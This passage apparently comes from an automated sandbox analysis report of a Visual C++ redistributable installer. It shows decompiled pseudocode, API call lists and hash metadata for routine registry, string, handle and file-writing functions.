                                                                          • RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000), ref: 000594AE
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000), ref: 000594BB
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000), ref: 000594C8
                                                                            • Part of subcall function 00050B49: RegCloseKey.ADVAPI32(00000000), ref: 00050CA0
                                                                            • Part of subcall function 00050E9B: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00059444,00000001), ref: 00050EB3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Close$InfoOpenQuery
                                                                          • String ID:
                                                                          • API String ID: 796878624-0
                                                                          • Opcode ID: 381a2440df9004220073956c402feb9002b90f4d43261dff108763d0927b57c3
                                                                          • Instruction ID: f3d917c9fcfae6fd8108880c843871ba34029a60fbdef589293428061e16f5be
                                                                          • Opcode Fuzzy Hash: 381a2440df9004220073956c402feb9002b90f4d43261dff108763d0927b57c3
                                                                          • Instruction Fuzzy Hash: AE410B72C0122DFFDF11AF958D81DAEFB7AEF04361B1145AAED0076121C7324E559E90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 65%
                                                                          			E000188DE(void* __ecx, void* __edx, int _a4, short* _a8, short* _a12, intOrPtr* _a16) {
                                                                          				int _v8;
                                                                          				short* _t38;
                                                                          				int _t43;
                                                                          				int _t46;
                                                                          				intOrPtr _t49;
                                                                          				intOrPtr _t53;
                                                                          				int _t55;
                                                                          				void* _t57;
                                                                          				unsigned int _t59;
                                                                          				void* _t60;
                                                                          				int _t61;
                                                                          				int _t67;
                                                                          				void* _t75;
                                                                          
                                                                          				_t57 = __edx;
                                                                          				_t49 = 0;
                                                                          				_t59 = _a4;
                                                                          				_v8 = _t59 >> 0x00000011 & 0x00000001;
                                                                          				_a4 = lstrlenW(_a8);
                                                                          				_t67 = lstrlenW(_a12);
                                                                          				if(_t59 > 0x3000a) {
                                                                          					_t60 = _t59 - 0x3000b;
                                                                          					if(_t60 == 0) {
                                                                          						goto L21;
                                                                          					} else {
                                                                          						if(_t60 == 1) {
                                                                          							goto L16;
                                                                          						} else {
                                                                          							goto L11;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					if(_t59 >= 0x30005) {
                                                                          						L7:
                                                                          						_t46 = CompareStringW(0x7f, _v8, _a8, _a4, _a12, _t67);
                                                                          						asm("cdq");
                                                                          						_t49 = E00018786(_t59, _t46, _t57, 2, _t49, _a16);
                                                                          					} else {
                                                                          						if(_t59 < 0x10005) {
                                                                          							L12:
                                                                          							_t49 = 0x80070057;
                                                                          						} else {
                                                                          							if(_t59 <= 0x1000a) {
                                                                          								goto L7;
                                                                          							} else {
                                                                          								if(_t59 == 0x1000b) {
                                                                          									L21:
                                                                          									_t61 = _a4;
                                                                          									if(_t67 > _t61) {
                                                                          										L25:
                                                                          										 *_a16 = _t49;
                                                                          									} else {
                                                                          										_t38 = _a8;
                                                                          										_a4 = _t67;
                                                                          										while(CompareStringW(0x7f, _v8, _t38, _t67, _a12, _t67) != 2) {
                                                                          											_t38 =  &(_a8[1]);
                                                                          											_t55 = _a4 + 1;
                                                                          											_a8 = _t38;
                                                                          											_a4 = _t55;
                                                                          											if(_t55 <= _t61) {
                                                                          												continue;
                                                                          											} else {
                                                                          												goto L25;
                                                                          											}
                                                                          											goto L26;
                                                                          										}
                                                                          										goto L19;
                                                                          									}
                                                                          								} else {
                                                                          									if(_t59 == 0x1000c) {
                                                                          										L16:
                                                                          										if(_a4 < _t67) {
                                                                          											goto L15;
                                                                          										} else {
                                                                          											_push(_t67);
                                                                          											_push(_a12);
                                                                          											_push(_t67);
                                                                          											_push(_a8);
                                                                          											goto L18;
                                                                          										}
                                                                          										goto L20;
                                                                          									} else {
                                                                          										_t75 = _t59 - 0x1000d;
                                                                          										L11:
                                                                          										if(_t75 == 0) {
                                                                          											_t43 = _a4;
                                                                          											if(_t43 < _t67) {
                                                                          												L15:
                                                                          												_t53 = _t49;
                                                                          											} else {
                                                                          												_push(_t67);
                                                                          												_push(_a12);
                                                                          												_push(_t67);
                                                                          												_push( &(_a8[_t43 - _t67]));
                                                                          												L18:
                                                                          												if(CompareStringW(0x7f, _v8, ??, ??, ??, ??) != 2) {
                                                                          													goto L15;
                                                                          												} else {
                                                                          													L19:
                                                                          													_t53 = 1;
                                                                          												}
                                                                          											}
                                                                          											L20:
                                                                          											 *_a16 = _t53;
                                                                          										} else {
                                                                          											goto L12;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				L26:
                                                                          				return _t49;
                                                                          			}

















                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00018A9E,000195E7,?,000195E7,?,?,000195E7,?,?), ref: 000188FE
                                                                          • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00018A9E,000195E7,?,000195E7,?,?,000195E7,?,?), ref: 00018906
                                                                          • CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,00018A9E,000195E7,?,000195E7,?), ref: 00018955
                                                                          • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00018A9E,000195E7,?,000195E7,?), ref: 000189B7
                                                                          • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00018A9E,000195E7,?,000195E7,?), ref: 000189E4
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareString$lstrlen
                                                                          • String ID:
                                                                          • API String ID: 1657112622-0
                                                                          • Opcode ID: 256d23b3e61120b57f6bde540fb658a2bf1e5c9a59319f00a37df08d131bdb72
                                                                          • Instruction ID: b5d63d1e5b7b56d3b120d7390c070def0916f8281ceced85cd146e4cf333c489
                                                                          • Opcode Fuzzy Hash: 256d23b3e61120b57f6bde540fb658a2bf1e5c9a59319f00a37df08d131bdb72
                                                                          • Instruction Fuzzy Hash: 9E317372600149BFDF258E58CC84AFE7FAAEF49390F18C015F95997111CA359AD0DB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 31%
                                                                          			E0001738E(void* __ecx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _t15;
                                                                          				void* _t22;
                                                                          
                                                                          				_t20 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				EnterCriticalSection(_a4);
                                                                          				_t22 = E00015C87(_t20, _a4, _a8,  &_v8);
                                                                          				_t15 = _v8;
                                                                          				if(_t22 < 0 ||  *((intOrPtr*)(_t15 + 0x18)) != 0) {
                                                                          					if(_t22 != 0x80070490) {
                                                                          						if(_t22 >= 0) {
                                                                          							_t22 = E000300E0(_t15 + 8, _a12);
                                                                          							if(_t22 < 0) {
                                                                          								_push(_a8);
                                                                          								_push("Failed to get value as string for variable: %ls");
                                                                          								goto L8;
                                                                          							}
                                                                          						} else {
                                                                          							_push(_a8);
                                                                          							_push("Failed to get value of variable: %ls");
                                                                          							L8:
                                                                          							_push(_t22);
                                                                          							E0005012F();
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_t22 = 0x80070490;
                                                                          				}
                                                                          				LeaveCriticalSection(_a4);
                                                                          				return _t22;
                                                                          			}







                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(000152B5,WixBundleOriginalSource,?,?,0002A41D,000153B5,WixBundleOriginalSource,0001533D,0007AA90,?,00000000,0001533D,?,00027587,?,?), ref: 0001739A
                                                                          • LeaveCriticalSection.KERNEL32(000152B5,000152B5,00000000,00000000,?,?,0002A41D,000153B5,WixBundleOriginalSource,0001533D,0007AA90,?,00000000,0001533D,?,00027587), ref: 00017401
                                                                          Strings
                                                                          • Failed to get value of variable: %ls, xrefs: 000173D4
                                                                          • Failed to get value as string for variable: %ls, xrefs: 000173F0
                                                                          • WixBundleOriginalSource, xrefs: 00017396
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
                                                                          • API String ID: 3168844106-30613933
                                                                          • Opcode ID: 3af97006a2efa65d32649dbbc7045bd5c155b5ba8344c3c431434c8e2326c705
                                                                          • Instruction ID: c4d94538891acd101c0c70a3f0389cd7136e5988847c55b57220f70cc9436571
                                                                          • Opcode Fuzzy Hash: 3af97006a2efa65d32649dbbc7045bd5c155b5ba8344c3c431434c8e2326c705
                                                                          • Instruction Fuzzy Hash: FE01B132945628FBCF225F50CC05ADE3B74EB04762F208021FD18AA220C7369E90ABE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0003CEF5(void* __ebx, void* __edi, void** _a4) {
                                                                          				void* _t13;
                                                                          				void** _t26;
                                                                          
                                                                          				_t26 = _a4;
                                                                          				if(_t26 != 0) {
                                                                          					if( *_t26 != 0) {
                                                                          						CloseHandle( *_t26);
                                                                          						 *_t26 = 0;
                                                                          					}
                                                                          					if(_t26[1] != 0) {
                                                                          						CloseHandle(_t26[1]);
                                                                          						_t26[1] = 0;
                                                                          					}
                                                                          					if(_t26[2] != 0) {
                                                                          						CloseHandle(_t26[2]);
                                                                          						_t26[2] = 0;
                                                                          					}
                                                                          					if(_t26[3] != 0) {
                                                                          						CloseHandle(_t26[3]);
                                                                          						_t26[3] = 0;
                                                                          					}
                                                                          					if(_t26[4] != 0) {
                                                                          						UnmapViewOfFile(_t26[4]);
                                                                          					}
                                                                          					return E00013999(_t26);
                                                                          				}
                                                                          				return _t13;
                                                                          			}






                                                                          APIs
                                                                          • CloseHandle.KERNEL32(?,00000000,?,00000000,?,0003CEEB,00000000), ref: 0003CF10
                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0003CEEB,00000000), ref: 0003CF1C
                                                                          • CloseHandle.KERNEL32(0005B508,00000000,?,00000000,?,0003CEEB,00000000), ref: 0003CF29
                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0003CEEB,00000000), ref: 0003CF36
                                                                          • UnmapViewOfFile.KERNEL32(0005B4D8,00000000,?,0003CEEB,00000000), ref: 0003CF45
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$FileUnmapView
                                                                          • String ID:
                                                                          • API String ID: 260491571-0
                                                                          • Opcode ID: fb6f8650060d80d92239ccea0c16587f40f9898d82f09cdc04deaf5a4ffff266
                                                                          • Instruction ID: 62cd137334fb73b4d17f1ef4b338185334631e3c42f5e9e3994ea2f72626bfd7
                                                                          • Opcode Fuzzy Hash: fb6f8650060d80d92239ccea0c16587f40f9898d82f09cdc04deaf5a4ffff266
                                                                          • Instruction Fuzzy Hash: A6014B76404B15DFDB316F56D880817FBEAEF50315714C83ED296A2421C771A840DF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 95%
                                                                          			E0004D038(void* __ebx, signed int __edx, signed int _a4, void* _a8, signed int _a12) {
                                                                          				signed int _v8;
                                                                          				long _v12;
                                                                          				struct _OVERLAPPED* _v16;
                                                                          				long _v20;
                                                                          				char _v24;
                                                                          				signed int _v28;
                                                                          				signed int _v32;
                                                                          				intOrPtr _v36;
                                                                          				signed int _v40;
                                                                          				signed int _v44;
                                                                          				intOrPtr _v48;
                                                                          				void* _v52;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t62;
                                                                          				intOrPtr _t66;
                                                                          				signed char _t68;
                                                                          				signed int _t69;
                                                                          				signed int _t71;
                                                                          				signed int _t73;
                                                                          				signed int _t74;
                                                                          				signed int _t77;
                                                                          				intOrPtr _t79;
                                                                          				signed int _t87;
                                                                          				signed int _t89;
                                                                          				signed int _t90;
                                                                          				signed int _t106;
                                                                          				signed int _t107;
                                                                          				signed int _t109;
                                                                          				intOrPtr _t111;
                                                                          				signed int _t116;
                                                                          				signed int _t118;
                                                                          				void* _t119;
                                                                          				signed int _t120;
                                                                          				signed int _t121;
                                                                          				void* _t122;
                                                                          
                                                                          				_t118 = __edx;
                                                                          				_t104 = __ebx;
                                                                          				_t62 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t62 ^ _t121;
                                                                          				_t109 = _a12;
                                                                          				_v12 = _t109;
                                                                          				_t120 = _a4;
                                                                          				_t119 = _a8;
                                                                          				_v52 = _t119;
                                                                          				if(_t109 != 0) {
                                                                          					__eflags = _t119;
                                                                          					if(_t119 != 0) {
                                                                          						_push(__ebx);
                                                                          						_t106 = _t120 >> 6;
                                                                          						_t118 = (_t120 & 0x0000003f) * 0x30;
                                                                          						_v32 = _t106;
                                                                          						_t66 =  *((intOrPtr*)(0x7b158 + _t106 * 4));
                                                                          						_v48 = _t66;
                                                                          						_v28 = _t118;
                                                                          						_t107 =  *((intOrPtr*)(_t66 + _t118 + 0x29));
                                                                          						__eflags = _t107 - 2;
                                                                          						if(_t107 == 2) {
                                                                          							L6:
                                                                          							_t68 =  !_t109;
                                                                          							__eflags = _t68 & 0x00000001;
                                                                          							if((_t68 & 0x00000001) != 0) {
                                                                          								_t66 = _v48;
                                                                          								L9:
                                                                          								__eflags =  *(_t66 + _t118 + 0x28) & 0x00000020;
                                                                          								if(__eflags != 0) {
                                                                          									E0004D2C2(_t120, 0, 0, 2);
                                                                          									_t122 = _t122 + 0x10;
                                                                          								}
                                                                          								_t69 = E0004CBDD(_t107, _t118, __eflags, _t120);
                                                                          								__eflags = _t69;
                                                                          								if(_t69 == 0) {
                                                                          									_t111 =  *((intOrPtr*)(0x7b158 + _v32 * 4));
                                                                          									_t71 = _v28;
                                                                          									__eflags =  *(_t111 + _t71 + 0x28) & 0x00000080;
                                                                          									if(( *(_t111 + _t71 + 0x28) & 0x00000080) == 0) {
                                                                          										_v24 = 0;
                                                                          										_v20 = 0;
                                                                          										_v16 = 0;
                                                                          										_t73 = WriteFile( *(_t111 + _t71 + 0x18), _t119, _v12,  &_v20, 0);
                                                                          										__eflags = _t73;
                                                                          										if(_t73 == 0) {
                                                                          											_v24 = GetLastError();
                                                                          										}
                                                                          										_t120 =  &_v24;
                                                                          										goto L28;
                                                                          									}
                                                                          									_t87 = _t107;
                                                                          									__eflags = _t87;
                                                                          									if(_t87 == 0) {
                                                                          										_t89 = E0004CC53( &_v24, _t120, _t119, _v12);
                                                                          										goto L17;
                                                                          									}
                                                                          									_t90 = _t87 - 1;
                                                                          									__eflags = _t90;
                                                                          									if(_t90 == 0) {
                                                                          										_t89 = E0004CE20( &_v24, _t120, _t119, _v12);
                                                                          										goto L17;
                                                                          									}
                                                                          									__eflags = _t90 != 1;
                                                                          									if(_t90 != 1) {
                                                                          										goto L34;
                                                                          									}
                                                                          									_t89 = E0004CD32( &_v24, _t120, _t119, _v12);
                                                                          									goto L17;
                                                                          								} else {
                                                                          									__eflags = _t107;
                                                                          									if(_t107 == 0) {
                                                                          										_t89 = E0004C9BD( &_v24, _t120, _t119, _v12);
                                                                          										L17:
                                                                          										L15:
                                                                          										_t120 = _t89;
                                                                          										L28:
                                                                          										_t119 =  &_v44;
                                                                          										asm("movsd");
                                                                          										asm("movsd");
                                                                          										asm("movsd");
                                                                          										_t74 = _v40;
                                                                          										__eflags = _t74;
                                                                          										if(_t74 != 0) {
                                                                          											__eflags = _t74 - _v36;
                                                                          											L40:
                                                                          											_pop(_t104);
                                                                          											L41:
                                                                          											return E0003DE36(_t104, _v8 ^ _t121, _t118, _t119, _t120);
                                                                          										}
                                                                          										_t77 = _v44;
                                                                          										__eflags = _t77;
                                                                          										if(_t77 == 0) {
                                                                          											_t119 = _v52;
                                                                          											L34:
                                                                          											_t116 = _v28;
                                                                          											_t79 =  *((intOrPtr*)(0x7b158 + _v32 * 4));
                                                                          											__eflags =  *(_t79 + _t116 + 0x28) & 0x00000040;
                                                                          											if(( *(_t79 + _t116 + 0x28) & 0x00000040) == 0) {
                                                                          												L37:
                                                                          												 *((intOrPtr*)(E00043E36())) = 0x1c;
                                                                          												_t81 = E00043E23();
                                                                          												 *_t81 =  *_t81 & 0x00000000;
                                                                          												__eflags =  *_t81;
                                                                          												L38:
                                                                          												goto L40;
                                                                          											}
                                                                          											__eflags =  *_t119 - 0x1a;
                                                                          											if( *_t119 != 0x1a) {
                                                                          												goto L37;
                                                                          											}
                                                                          											goto L40;
                                                                          										}
                                                                          										_t120 = 5;
                                                                          										__eflags = _t77 - _t120;
                                                                          										if(_t77 != _t120) {
                                                                          											_t81 = E00043E00(_t77);
                                                                          										} else {
                                                                          											 *((intOrPtr*)(E00043E36())) = 9;
                                                                          											 *(E00043E23()) = _t120;
                                                                          										}
                                                                          										goto L38;
                                                                          									}
                                                                          									__eflags = _t107 - 1 - 1;
                                                                          									if(_t107 - 1 > 1) {
                                                                          										goto L34;
                                                                          									}
                                                                          									_t89 = E0004CB70( &_v24, _t119, _v12);
                                                                          									goto L15;
                                                                          								}
                                                                          							}
                                                                          							 *(E00043E23()) =  *_t97 & 0x00000000;
                                                                          							 *((intOrPtr*)(E00043E36())) = 0x16;
                                                                          							_t81 = E00043D7A();
                                                                          							goto L38;
                                                                          						}
                                                                          						__eflags = _t107 - 1;
                                                                          						if(_t107 != 1) {
                                                                          							goto L9;
                                                                          						}
                                                                          						goto L6;
                                                                          					}
                                                                          					 *(E00043E23()) =  *_t99 & _t119;
                                                                          					 *((intOrPtr*)(E00043E36())) = 0x16;
                                                                          					E00043D7A();
                                                                          					goto L41;
                                                                          				}
                                                                          				goto L41;
                                                                          			}








































                                                                          0x0004d12d
                                                                          0x0004d132
                                                                          0x0004d11d
                                                                          0x0004d11d
                                                                          0x0004d1c0
                                                                          0x0004d1c0
                                                                          0x0004d1c3
                                                                          0x0004d1c4
                                                                          0x0004d1c5
                                                                          0x0004d1c6
                                                                          0x0004d1c9
                                                                          0x0004d1cb
                                                                          0x0004d230
                                                                          0x0004d233
                                                                          0x0004d233
                                                                          0x0004d234
                                                                          0x0004d243
                                                                          0x0004d243
                                                                          0x0004d1cd
                                                                          0x0004d1d0
                                                                          0x0004d1d2
                                                                          0x0004d1f8
                                                                          0x0004d1fb
                                                                          0x0004d1fe
                                                                          0x0004d201
                                                                          0x0004d208
                                                                          0x0004d20d
                                                                          0x0004d218
                                                                          0x0004d21d
                                                                          0x0004d223
                                                                          0x0004d228
                                                                          0x0004d228
                                                                          0x0004d22b
                                                                          0x00000000
                                                                          0x0004d22b
                                                                          0x0004d20f
                                                                          0x0004d212
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004d214
                                                                          0x0004d1d6
                                                                          0x0004d1d7
                                                                          0x0004d1d9
                                                                          0x0004d1f0
                                                                          0x0004d1db
                                                                          0x0004d1e0
                                                                          0x0004d1eb
                                                                          0x0004d1eb
                                                                          0x00000000
                                                                          0x0004d1d9
                                                                          0x0004d104
                                                                          0x0004d107
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004d115
                                                                          0x00000000
                                                                          0x0004d11a
                                                                          0x0004d0fc
                                                                          0x0004d0c2
                                                                          0x0004d0ca
                                                                          0x0004d0d0
                                                                          0x00000000
                                                                          0x0004d0d0
                                                                          0x0004d0b0
                                                                          0x0004d0b3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004d0b3
                                                                          0x0004d06f
                                                                          0x0004d076
                                                                          0x0004d07c
                                                                          0x00000000
                                                                          0x0004d081
                                                                          0x00000000

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @Met
                                                                          • API String ID: 0-2381362037
                                                                          • Opcode ID: a54e8a598babc626802e65997ed34a5feda4b02bc639c40a408ab0d812985c23
                                                                          • Instruction ID: 4e469ab3668c05083676855e5bfeab5f22f750a7910b32c3cea6a6aa46f8d8ce
                                                                          • Opcode Fuzzy Hash: a54e8a598babc626802e65997ed34a5feda4b02bc639c40a408ab0d812985c23
                                                                          • Instruction Fuzzy Hash: DB51D3F1E00209ABDB219FA4C945FEE7BF8AF15310F14006AF800A72A2D7749A01CB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 80%
                                                                          			E000579CC(void* __ebx, void* __eflags, intOrPtr* _a4, signed int _a8) {
                                                                          				signed int _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				void* _v24;
                                                                          				intOrPtr* _t66;
                                                                          				signed int _t67;
                                                                          				signed int _t68;
                                                                          				intOrPtr* _t71;
                                                                          				intOrPtr* _t77;
                                                                          				void* _t79;
                                                                          				intOrPtr* _t81;
                                                                          				signed int _t82;
                                                                          				signed int _t86;
                                                                          				signed int _t90;
                                                                          				intOrPtr* _t91;
                                                                          				signed int _t92;
                                                                          				signed int _t93;
                                                                          
                                                                          				_v12 = 0;
                                                                          				_v16 = 0;
                                                                          				_v20 = 0;
                                                                          				_v24 = 0;
                                                                          				_v8 = 0;
                                                                          				_t90 = E000138D4(0x14, 1);
                                                                          				if(_t90 != 0) {
                                                                          					_t77 = _a4;
                                                                          					_t92 =  *((intOrPtr*)( *_t77 + 0x9c))(_t77,  &_v12, __ebx);
                                                                          					__eflags = _t92;
                                                                          					if(_t92 != 0) {
                                                                          						__eflags = _t92 - 1;
                                                                          						_t93 = (_t92 == 1) ? 0 : _t92;
                                                                          						goto L6;
                                                                          					} else {
                                                                          						_t93 = E000121A5(_t90, _v12, _t45);
                                                                          						__eflags = _t93;
                                                                          						if(_t93 >= 0) {
                                                                          							L6:
                                                                          							__eflags = _t93;
                                                                          							if(_t93 >= 0) {
                                                                          								_t93 =  *((intOrPtr*)( *_t77 + 0xa4))(_t77,  &_v16);
                                                                          								__eflags = _t93;
                                                                          								if(_t93 >= 0) {
                                                                          									_t13 = _t90 + 4; // 0x4
                                                                          									_t93 = E000121A5(_t13, _v16, 0);
                                                                          									__eflags = _t93;
                                                                          									if(_t93 >= 0) {
                                                                          										_t93 = E000533C8(_t77,  &_v20);
                                                                          										__eflags = _t93;
                                                                          										if(_t93 >= 0) {
                                                                          											_t16 = _t90 + 8; // 0x8
                                                                          											_t93 = E000121A5(_t16, _v20, 0);
                                                                          											__eflags = _t93;
                                                                          											if(_t93 >= 0) {
                                                                          												_t93 =  *((intOrPtr*)( *_t77 + 0x44))(_t77,  &_v24);
                                                                          												__eflags = _t93;
                                                                          												if(_t93 >= 0) {
                                                                          													_t66 = _v24;
                                                                          													_t67 =  *((intOrPtr*)( *_t66 + 0x38))(_t66,  &_v8);
                                                                          													__eflags = _t67;
                                                                          													if(__eflags != 0) {
                                                                          														L18:
                                                                          														__eflags = _t67 - 1;
                                                                          														_t93 = (_t67 != 1) ? _t67 : 0;
                                                                          														__eflags = _t93;
                                                                          														if(_t93 >= 0) {
                                                                          															_t68 = _a8;
                                                                          															while(1) {
                                                                          																__eflags =  *_t68;
                                                                          																if( *_t68 == 0) {
                                                                          																	break;
                                                                          																}
                                                                          																_t68 =  *_t68 + 0x10;
                                                                          																__eflags = _t68;
                                                                          															}
                                                                          															 *_t68 = _t90;
                                                                          															_t90 = 0;
                                                                          															__eflags = 0;
                                                                          														}
                                                                          													} else {
                                                                          														_t22 = _t90 + 0xc; // 0xc
                                                                          														_t79 = _t22;
                                                                          														while(1) {
                                                                          															_t93 = E000578C5(_t79, __eflags, _v8, _t79);
                                                                          															__eflags = _t93;
                                                                          															if(_t93 < 0) {
                                                                          																goto L23;
                                                                          															}
                                                                          															_t86 = _v8;
                                                                          															__eflags = _t86;
                                                                          															if(_t86 != 0) {
                                                                          																 *((intOrPtr*)( *_t86 + 8))(_t86);
                                                                          																_t26 =  &_v8;
                                                                          																 *_t26 = _v8 & 0x00000000;
                                                                          																__eflags =  *_t26;
                                                                          															}
                                                                          															_t71 = _v24;
                                                                          															_t67 =  *((intOrPtr*)( *_t71 + 0x38))(_t71,  &_v8);
                                                                          															__eflags = _t67;
                                                                          															if(__eflags == 0) {
                                                                          																continue;
                                                                          															} else {
                                                                          																goto L18;
                                                                          															}
                                                                          															goto L23;
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					L23:
                                                                          				} else {
                                                                          					_t93 = 0x8007000e;
                                                                          					E000137D3(_t43, "atomutil.cpp", 0x397, 0x8007000e);
                                                                          				}
                                                                          				E00056A7C(_t90);
                                                                          				_t91 = __imp__#6;
                                                                          				if(_v12 != 0) {
                                                                          					 *_t91(_v12);
                                                                          				}
                                                                          				if(_v16 != 0) {
                                                                          					 *_t91(_v16);
                                                                          				}
                                                                          				if(_v20 != 0) {
                                                                          					 *_t91(_v20);
                                                                          				}
                                                                          				_t81 = _v24;
                                                                          				if(_t81 != 0) {
                                                                          					 *((intOrPtr*)( *_t81 + 8))(_t81);
                                                                          				}
                                                                          				_t82 = _v8;
                                                                          				if(_t82 != 0) {
                                                                          					 *((intOrPtr*)( *_t82 + 8))(_t82);
                                                                          				}
                                                                          				return _t93;
                                                                          			}





















                                                                          0x00057b2c
                                                                          0x00057b2c
                                                                          0x00057b32
                                                                          0x00057b37
                                                                          0x00057b37
                                                                          0x00057b3d
                                                                          0x00057b42
                                                                          0x00057b42
                                                                          0x00057b44
                                                                          0x00057b49
                                                                          0x00057b4e
                                                                          0x00057b4e
                                                                          0x00057b51
                                                                          0x00057b56
                                                                          0x00057b5b
                                                                          0x00057b5b
                                                                          0x00057b65

                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00057B2C
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00057B37
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00057B42
                                                                          Strings
